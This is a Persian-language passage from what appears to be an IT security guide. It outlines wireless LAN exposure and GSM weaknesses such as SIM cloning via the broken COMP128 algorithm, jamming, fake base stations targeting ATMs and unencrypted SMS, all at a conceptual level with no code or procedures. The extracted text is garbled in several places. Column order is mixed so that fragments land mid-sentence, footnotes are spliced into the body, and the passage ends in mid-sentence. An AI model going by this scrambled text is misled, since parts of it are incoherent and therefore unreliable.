‫ﺍﺭﺗﺒﺎﻁ ﻧﻘﻄﺔ ﺳﻴﺎﺭ ﺑﺎ ﻧﻘﻄﺔ ﺳﻴﺎﺭ ﺩﻳﮕـﺮ‪ :‬ﺍﻏﻠـﺐ‬
‫ﻧﻘــﺎﻁ ﺳــﻴﺎﺭ )ﻣﺜــﻞ ﺭﺍﻳﺎﻧــﻪﻫــﺎﻱ ﻗﺎﺑــﻞ ﺣﻤــﻞ ﻭ ‪PDA‬ﻫــﺎ(‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺧﺪﻣﺎﺕ ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﻳﺎ ﻫﺮﮔﻮﻧـﻪ ﺧـﺪﻣﺎﺕ‬
‫‪ TCP/IP‬ﺭﻭﻱ ﺁﻧﻬــﺎ ﻓﻌــﺎﻝ ﺑﺎﺷــﺪ‪ ،‬ﻗــﺎﺩﺭ ﺑــﻪ ﺍﺭﺗﺒــﺎﻁ‬
‫ﺑﻲﻭﺍﺳﻄﻪ ﻭ ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﺴﺘﻨﺪ‪ .‬ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺑـﻪ‬
‫ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﻧﻘﻄﺔ ﺳﻴﺎﺭ ﻗﺎﺩﺭ ﺍﺳﺖ ﻳﻚ ﻓﺎﻳـﻞ‬
‫ﻳﺎ ﺑﺮﻧﺎﻣﺔ ﺧﻄﺮﻧﺎﻙ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﺔ ﺷﻤﺎ ﻣﻨﺘﻘﻞ ﻛﻨﺪ‪.‬‬
‫‪١٩٠‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﮔﺴﺘﺮﺵ ﺍﺳﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺗﻤﺎﻡ ﺷﺮﻛﺘﻬﺎ ﻭ ﻣﺆﺳﺴﺎﺗﻲ ﻛـﻪ ﺩﺍﺭﺍﻱ‬
‫ﺷﺒﻜﻪ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﻫﺴﺘﻨﺪ ﺭﺍ ﺗﻬﺪﻳﺪ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺭﺍﻫﺒﺮ ﺷﺒﻜﻪ ﻫﻨﮕﺎﻡ ﺗﻨﻈﻴﻢ ﻭ ﺍﺳـﺘﻘﺮﺍﺭ‬
‫ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﺑﺒﻴﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺣﻤـﻞ ﺗﻨﻬـﺎ ﺩﺭ‬
‫ﻓﺎﺻﻠﺔ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺷـﺒﻜﻪ ﻣﺘـﺼﻞ‬
‫ﺷﻮﻧﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﮔﻤﺎﻥ ﻛﻨﺪ ﻛﻪ ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﻓﻮﺍﺻـﻠﻲ‬
‫ﺩﻭﺭﺗﺮ ﺍﺯ ﺁﻥ ﻓﺎﺻﻠﻪ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ ﻧﻴـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ ﺍﻳـﻦ ﻓـﺮﺽ‬
‫ﻧﺎﺩﺭﺳﺖ ﺍﺳﺖ‪ .‬ﺩﺭ ﺣﻘﻴﻘﺖ ﺳﻴﮕﻨﺎﻟﻬﺎ ﺩﺭ ﻃﻮﻝ ﻫﺰﺍﺭﺍﻥ ﻣﺘﺮ ‪ -‬ﺗـﺎ‬
‫ﺟﺎﻳﻲ ﻛﻪ ﭼﻴﺰﻱ ﺁﻧﻬﺎ ﺭﺍ ﻣﻨﺤﺮﻑ ﻳﺎ ﺩﭼـﺎﺭ ﻭﻗﻔـﻪ ﻧﻜﻨـﺪ ‪ -‬ﻗﺎﺑـﻞ‬
‫ﺩﺭﻳﺎﻓﺖ ﻫﺴﺘﻨﺪ‪ .‬ﺩﻟﻴﻞ ﺁﻥ ﺍﺳﺘﺪﻻﻝ ﻏﻠﻂ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺁﻧـﺘﻦ‬
‫ﻛﻮﭼﻚ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺣﻤـﻞ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ ﺿـﻌﻴﻒ ﺭﺍ‬
‫ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ؛ ﺍﻣﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺁﻧﺘﻦ ﺧﺎﺭﺟﻲ‪ ،‬ﻣﻲﺗـﻮﺍﻥ ﺑـﺮﺩ‬
‫ﻻ ﺑﮕﻮﻧﻪﺍﻱ‬
‫ﺳﻴﮕﻨﺎﻟﻬﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩ‪ .‬ﺑﺨﺶ ﺑﻲﺳﻴﻢ ﺷﺒﻜﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺳﺖ ﻛﻪ ﻧﻔﻮﺫﮔﺮ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺗﺮﺍﻓﻴﻚ ﺁﻥ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﺩ ﺑﻪ‬
‫ﭼﻴﺰﻱ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﭘﻴﺪﺍ ﻛﻨﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺍﻳﻦ ﺷﺒﻜﻪﻫﺎ‬
‫ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺗﻲ ﭼـﻮﻥ ﺩﺯﺩﻱ ﭘﻴـﺎﻡ‪ ،‬ﺗﻐﻴﻴـﺮ ﭘﻴـﺎﻡ‪ ،‬ﻳـﺎ ﺍﺭﺳـﺎﻝ‬
‫ﭘﺎﺭﺍﺯﻳﺖ ﻣﻴﺎﻥ ﭘﻴﺎﻡ‪ ،‬ﺩﺍﺭﺍﻱ ﺿﻌﻒ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﻣﺴﺎﺋﻞ ﻣﺬﻛﻮﺭ ﺍﻫﻤﻴﺖ ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ‬
‫ﺑﻲﺳﻴﻢ ﺭﺍ ﺭﻭﺷﻦ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻫﺮﻳﻚ ﺍﺯ ﺿﻌﻔﻬﺎﻱ ﻓﻮﻕ ﺭﺍ ﻣﻲﺗﻮﺍﻥ‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺗﺠﺮﺑﻴـﺎﺕ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﻃﺮﺍﺣـﻲ‬
‫ﺷﺒﻜﻪ‪ ،‬ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺍﻣﻨﻴﺘـﻲ ﻭ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﺻـﺤﻴﺢ‬
‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻩ ﻭ ﻳـﺎ ﺍﺯ ﺑـﻴﻦ ﺑـﺮﺩ‪ .‬ﺁﺧـﺮﻳﻦ‬
‫ﻓﺼﻠﻬﺎﻱ ﺑﺨﺶ ﺳﻮﻡ ﺑﻪ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑـﺎﺭﺓ ﻧﺤـﻮﺓ ﺍﻣـﻦ ﻛـﺮﺩﻥ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ‪.‬‬
‫ﺩ‪.‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺭ ﺍﺭﻭﭘﺎ‪GSM :‬‬
‫‪ GSM‬ﮔﺴﺘﺮﺩﻩﺗﺮﻳﻦ ﻭ ﺩﺭﺣﺎﻝ ﺭﺷﺪﺗﺮﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ‬
‫ﺩﻳﺠﻴﺘﺎﻝ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺟﻬﺎﻥ ﺍﺳﺖ‪ .‬ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﭼﻴـﺰﻱ‬
‫ﻧﺰﺩﻳﻚ ﺑﻪ ‪ ۶۰۰‬ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻙ ‪ GSM‬ﺩﺭ ﺩﻧﻴﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ‪-‬‬
‫ﺭﻗﻤﻲ ﺑﻴﺶ ﺍﺯ ﺩﻭ ﺳﻮﻡ ﺗﻌـﺪﺍﺩ ﻛـﻞ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺳـﻴﺎﺭﻱ ﻛـﻪ ﺩﺭ‬
‫ﺟﻬﺎﻥ ﻣﻮﺟﻮﺩ ﺍﺳﺖ‪ ١٦٢.‬ﺍﻳﻦ ﺭﻗﻢ ﺑﺎ ﺳﺮﻋﺖ ﭼﻬﺎﺭ ﻛﺎﺭﺑﺮ ﺟﺪﻳﺪ ﺩﺭ‬
‫‪ ۱۶۲‬ﺳﻴﺴﺘﻢ ‪ GSM‬ﺁﻣﺮﻳﻜﺎﻱ ﺷﻤﺎﻟﻲ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻫﻨﮕـﺎﻡ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ‬
‫ﺧﺪﻣﺎﺕ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺎ ﺳـﺮﻋﺖ ‪ 1900MHz‬ﻛـﺎﺭ ﻣـﻲﻛﻨـﺪ‪.‬‬
‫ﺧﺪﻣﺎﺕ ﺩﺍﺩﻩﺍﻱ ‪ GSM‬ﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ ‪Short Message ) SMS‬‬
‫‪Analog Cellular Switched ) CSD ،(Servise‬‬
‫‪General‬‬
‫‪Packet‬‬
‫‪Radio‬‬
‫‪ ،(Data‬ﻭ ‪) GPRS‬‬
‫‪ .(Service‬ﺑﻴﺸﺘﺮ ﺷﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﮔﻮﻧـﻪ‪-‬‬
‫ﺍﻱ ﺍﺯ ‪ GSM‬ﺭﺍ ﺑﻜــﺎﺭ ﻣــﻲﺑﺮﻧــﺪ ﻛــﻪ ﻳــﺎ ﺩﺭ ‪ 900MHz‬ﻭ ﻳــﺎ ﺩﺭ‬
‫ﺛﺎﻧﻴﻪ ﺩﺭﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ‪ .‬ﭘﻮﺷﺶ ‪ GSM‬ﻫﻤﺔ ﻗـﺎﺭﻩﻫـﺎ ﺭﺍ ﺩﺭ‬
‫ﻱ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ‪ ۴۰۰‬ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ‬
‫ﺑﺮ ﻣﻲﮔﻴﺮﺩ‪ ،‬ﺑﻄﻮﺭﻳﻜﻪ ﻓﻨﺎﻭﺭ ﹺ‬
‫ﺧﺪﻣﺎﺕ ﺩﺭ ﺑﻴﺶ ﺍﺯ ‪ ۱۷۰‬ﻛﺸﻮﺭ ﺩﻧﻴﺎ ﺍﺳﺖ‪ .‬ﺍﻣـﺎ ﺍﻳـﻦ ﺗﻨﻬـﺎ ﺁﻏـﺎﺯ‬
‫ﺍﻧﻘﻼﺏ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺍﺳﺖ‪.‬‬
‫ﻣﺤﻘﻘﺎﻥ ﺻﻨﻌﺘﻲ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺗﺎ ﭘﺎﻳﺎﻥ ﺳﺎﻝ ‪ ۲۰۰۵‬ﺩﺭ‬
‫ﺣﺪﻭﺩ ‪ ۱،۴‬ﻣﻴﻠﻴﺎﺭﺩ ﻛﺎﺭﺑﺮ ‪ GSM‬ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺗﻠﻔﻨﻬـﺎﻱ‬
‫‪ GSM‬ﺩﺭ ﺩﺍﺧﻞ ﺧـﻮﺩ ﺩﺍﺭﺍﻱ ﻳـﻚ ﻛـﺎﺭﺕ ﻛﻮﭼـﻚ ﻫﻮﺷـﻤﻨﺪ‬
‫ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﺸﺨﺼﺎﺕ ﺗﻠﻔﻦ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ ﻭ ﺑﻪ ﻧـﺎﻡ‬
‫ﻭﺍﺣﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﺸﺘﺮﻱ )‪ ١٦٣(SIM‬ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ‪ SIM .‬ﺑﺎﻳـﺪ‬
‫ﺍﺯ ﻣﺸﺨﺼﺎﺕ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺭﻣﺰﻧﮕـﺎﺭﻱﺷـﺪﻩ ﻧﮕﻬـﺪﺍﺭﻱ‬
‫ﻛﻨﺪ؛ ﻟﺬﺍ ﺑﻪ ﻛﺎﺭﺕ ‪ SIM‬ﻫﻢ ﻣﻲﺗﻮﺍﻥ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻘﻄﺔ ﻗﻮﺕ ﻭ‬
‫ﻫﻢ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻘﻄﺔ ﺿﻌﻒ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﻓﻨـﺎﻭﺭﻱ ‪ GSM‬ﻧﮕـﺎﻩ‬
‫ﻛﺮﺩ‪.‬‬
‫ﻧﻘﺎﻁ ﺿﻌﻒ ‪GSM‬‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻛﺎﺭﺕ ‪SIM‬‬
‫ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ GSM‬ﺁﻣﺮﻳﻜﺎ ﻭ ﺍﺭﻭﭘﺎ‪ ،‬ﺭﻭﺵ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺷﺒﻜﻪ‬
‫ﻳﻜﺴﺎﻥ ﺍﺳﺖ‪ .‬ﻛﺎﺭﺗﻬـﺎﻱ ﻫﻮﺷـﻤﻨﺪ ﻗﺎﺑـﻞ ﺟﺎﺑﺠـﺎﻳﻲ ﺩﺭ ﺗﻠﻔﻨﻬـﺎ‬
‫)ﻛﺎﺭﺗﻬﺎﻱ ‪ (SIM‬ﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻤﺎﺭﻩﻫـﺎﻱ ﺗﻤـﺎﺱ‪ ،‬ﺍﻃﻼﻋـﺎﺕ‬
‫ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ‪ ،‬ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺟﺎﻧﺒﻲ ﻣﺜﻞ ﻣﺮﻭﺭﮔـﺮ ﻭﺏ ﺑﻜـﺎﺭ‬
‫ﻣﻲﺭﻭﻧﺪ‪ .‬ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﻛﺎﺭﺗﻬﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣـﻲﺷـﻮﻧﺪ‪،‬‬
‫ﺍﻣﺎ ﺍﻟﮕﻮﺭﻳﺘﻢ ‪ COMP128‬ﻛﻪ ﺩﺭ ﺍﻳﻨﻜﺎﺭ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﭘـﻴﺶ ﺍﺯ‬
‫ﺍﻳﻦ ﺷﻜﺴﺘﻪ ﺷﺪﻩ ﻭ ﻟﺬﺍ ﺍﻳﻦ ﻛﺎﺭﺗﻬﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﻛﭙﻲﺑﺮﺩﺍﺭﻱ )ﺳـﺎﺧﺖ‬
‫ﻳﻚ ﻧﺴﺨﺔ ﻣﺸﺎﺑﻪ ﺍﺯ ﺧـﻮﺩ( ﺍﻳﻤـﻦ ﻧﻴـﺴﺘﻨﺪ‪ War driving .‬ﺑـﺮﺍﻱ‬
‫ﻣﺸﺘﺮﻛﻴﻦ ﺗﻠﻔﻨﻬـﺎﻱ ﻫﻤـﺮﺍﻩ ﻛـﻪ ﺍﺯ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ‪ GSM‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ ﻣﺴﺌﻠﻪ ﺧﻄﺮﻧﺎﻛﻲ ﻧﻴﺴﺖ‪ .‬ﻣﺴﺘﻘﻞ ﺍﺯ ﻃﻴﻒ ﻓﺮﻛﺎﻧﺴﻲ‪ ،‬ﺑﺎ‬
‫ﺍﺭﺳﺎﻝ ﭘﺎﺭﺍﺯﻳﺖ ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗـﻮﺍﻥ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ ﺗﻠﻔـﻦ ﻫﻤـﺮﺍﻩ ﺭﺍ‬
‫ﺩﭼﺎﺭ ﻭﻗﻔﻪ ﻛﺮﺩ‪ .‬ﻳﻚ ﺭﻭﺵ ﺑﺴﻴﺎﺭ ﻣﻌﺮﻭﻑ ﺑﺮﺍﻱ ﺑﺪﺳـﺖ ﺁﻭﺭﺩﻥ‬
‫ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ﮔﻔﺘﮕﻮﻱ ‪ ١٦٤GSM‬ﺩﺭ ﻛﻤﺘﺮ ﺍﺯ ﻳﻚ ﺛﺎﻧﻴﻪ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪ 1800MHz‬ﻛﺎﺭ ﻣﻲﻛﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻛـﺸﻮﺭﻫﺎﻱ ﺍﺭﻭﭘـﺎﻳﻲ ﻣـﻲ‪-‬‬
‫ﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻣﺪﺍﺭ ﺳﻮﺋﻴﭽﻲ ﭘﺮﺳـﺮﻋﺖ ﺩﺍﺩﻩ ) ‪High Speed Circuit‬‬
‫‪ (HSCSD ،Switched Data‬ﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻨــﺪ‪ ،‬ﻛــﻪ ﻣــﻲﺗﻮﺍﻧــﺪ‬
‫ﻛﺎﻧﺎﻟﻬــﺎﻱ ﺍﺭﺗﺒــﺎﻃﻲ ﻣﺨﺘﻠــﻒ ﺭﺍ ﺩﺭ ﻳــﻚ ﻛﺎﻧــﺎﻝ ﺑــﺎ ﻗﺎﺑﻠﻴــﺖ ﻛــﺎﺭ‬
‫‪ 38.4KBPS‬ﺍﺩﻏﺎﻡ ﻛﻨﺪ‪ GPRS .‬ﺩﺭ ﺑﻴﺸﺘﺮ ﻛﺸﻮﺭﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬
‫‪163 Subscriber Identification Module‬‬
‫‪164 Encrypted GSM Conversation Key‬‬
‫‪١٩١‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ‪ GSM‬ﺑﺴﺘﮕﻲ ﺑﻪ ﺷﺮﺍﻳﻂ ﺩﺍﺭﺩ‪ .‬ﺍﺯ ﻛـﺎﺭﺕ ‪SIM‬‬
‫ﻣﻲﺗﻮﺍﻥ ﻧﺴﺨﺔ ﺑﺪﻝ ﺍﻳﺠﺎﺩ ﻧﻤـﻮﺩ‪ .‬ﻧﻔـﻮﺫ ﺑـﻪ ﺁﻥ ﻧﻴـﺰ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ‬
‫ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺣﺴﺎﺱ ﺁﻥ ﺷﻜﺴﺘﻪ ﺷـﺪﻩﺍﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻣﺸﻜﻞ ﺁﺧﺮ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﻪ ﻧﺎﺍﻣﻦ ﺷـﺪﻥ ﻛﺎﻣـﻞ ﻣﻜﺎﻟﻤـﺎﺕ ﺗﻠﻔﻨـﻲ‬
‫‪ GSM‬ﻧﻴﺰ ﻣﻨﺠﺮ ﺷﻮﺩ‪.‬‬
‫ﺩﺭ ﻣــﻮﺭﺩ ﺍﺳــﺘﻔﺎﺩﺓ ﻳــﻚ ﺑﺎﻧــﻚ ﺍﺯ ﻓﻨــﺎﻭﺭﻱ ‪ GSM‬ﻣــﺸﻜﻼﺕ‬
‫ﺩﻳﮕﺮﻱ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺍﮔﺮ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ‬
‫ﺭﺍﻩ ﺩﻭﺭ ﻧﺘﻮﺍﻧﺪ ﺑﺎ ﻳﻚ ﺑﺮﺝ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻭﺍﻗﻌﻲ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻛﻨـﺪ‪،‬‬
‫ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻳﻚ ﺑﺮﺝ ﺟﻌﻠﻲ ﻓﺮﻳﺐ ﺩﺍﺩ‪.‬‬
‫ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﻧﻔﻮﺫﮔﺮ ﺍﻣﻜﺎﻥ ﻛﻨﺘﺮﻝ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﺍﻧﺠـﺎﻡ‬
‫ﮔﺮﻓﺘﻪ ﺩﺭ ﺁﻥ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺭﺍ ﭘﺪﻳﺪ ﺧﻮﺍﻫﺪ ﺁﻭﺭﺩ‪.‬‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ‪SMS‬‬
‫‪ GSM‬ﺧﺪﻣﺎﺕ ﭘﻴﺎﻣﻬﺎﻱ ﻛﻮﺗﺎﻩ )‪ (SMS‬ﺭﺍ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲ ﺩﻫﺪ‪.‬‬
‫‪ SMS‬ﺩﺭ ﺳﻴﺴﺘﻢ ‪ GSM‬ﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺩﺍﺭﺩ‪ ،‬ﺍﺯ ﺟﻤﻠﻪ‬
‫ﺍﻋﻼﻧﻬﺎﻱ ﭘﺴﺖ ﺻﻮﺗﻲ ‪ ،‬ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ‪ SIM‬ﻣـﺸﺘﺮﻱ‪ ،‬ﺍﺭﺳـﺎﻝ‬
‫ﭘﻴﺎﻣﻬــﺎﻱ ﻛﻮﺗــﺎﻩ ﻣﺘﻨــﻲ‪ ،‬ﻭ ﺍﺭﺗﺒــﺎﻁ ﺑــﺎ ﺩﺭﻭﺍﺯﻩﻫــﺎﻱ ﭘــﺴﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ .‬ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻨﻜﻪ ﻣـﻮﺍﺭﺩ ﻓـﻮﻕ ﺧـﺪﻣﺎﺕ ﭘﺮﻛـﺎﺭﺑﺮﺩﻱ‬
‫ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ ﺟﺪﻳـﺪﻱ ﺑـﺮﺍﻱ ﺷـﺒﻜﻪ ﺑﻮﺟـﻮﺩ‬
‫ﻣﻲﺁﻭﺭﻧﺪ‪ SMS .‬ﻧﻮﻋﻲ ﺳﺮﻭﻳﺲ ﺫﺧﻴﺮﻩ ﻭ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺍﺳﺖ ﻛﻪ‬
‫ﺫﺍﺗﹰﺎ ﻧﺎﺍﻣﻦ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﺩﺭ ﺁﻥ ﺗﻤﺎﻡ ﭘﻴﺎﻣﻬﺎ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ‬
‫ﻭ ﺭﻣﺰﻧﺸﺪﻩ ﺗﺒﺎﺩﻝ ﻣﻲﺷﻮﻧﺪ ﻭ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺁﻧﻬﺎ ﺩﺭ ﻣﺮﻛﺰ ‪SMS‬‬
‫ﭘﻴﺶ ﺍﺯ ﺍﺭﺳﺎﻝ ﺑﻪ ﻣﻘﺼﺪ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺭﻣﺰﻧﺸﺪﻩ ﺍﺳـﺖ‪ .‬ﺍﺯ ﺩﻳﮕـﺮ‬
‫ﻣﺸﻜﻼﺕ ‪ SMS‬ﺗﺄﺧﻴﺮ ﺩﺭ ﺭﺳﻴﺪﻥ ﭘﻴﺎﻡ ﺑـﻪ ﻣﻘـﺼﺪ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺗﺮﺍﻛﻨﺸﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﺯﻣﺎﻧﻲ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﺑﻪ ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻨﺪ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕـﺮ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﺭﺍﻳﮕﺎﻥ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣـﻲﺗـﻮﺍﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ ‪SMS‬‬
‫ﺟﻌﻠﻲ ﺳﺎﺧﺖ‪ ،‬ﺑﻪ ﮔﻮﺷﻲﻫﺎ ﻭ ﻣﺮﺍﻛﺰ ‪ SMS‬ﺳـﻴﻠﻲ ﺍﺯ ﺑﻤﺒﻬـﺎﻱ‬
